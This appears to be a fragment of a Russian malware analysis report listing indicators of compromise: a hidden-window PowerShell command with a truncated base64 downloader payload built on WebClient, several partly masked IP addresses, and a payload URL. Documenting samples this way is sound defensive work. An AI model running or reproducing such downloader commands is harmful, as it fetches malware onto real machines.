Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADQAOAAwADcAMAAyAF8APQAoACcAdQAnACsAJwA0ADkAXwBfADIAJwApADsAJABJAF8AOQA5AF8AMQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABWAF8AMgA0AF8AOAA5ADYAPQAoACcAaAB0AH...
- '52.##6.174.152':80
- '35.##0.186.53':80
- '10#.#54.86.219':80
- '15#.#5.65.213':80
- '19#.#7.216.20':80
- http://15#.#5.65.213/2TsF5icjLdR_6yyM5jk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADQAOAAwADcAMAAyAF8APQAoACcAdQAnACsAJwA0ADkAXwBfADIAJwApADsAJABJAF8AOQA5AF8AMQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABWAF8AMgA0AF8AOAA5ADYAPQAoACcAaAB0AH...' (со скрытым окном)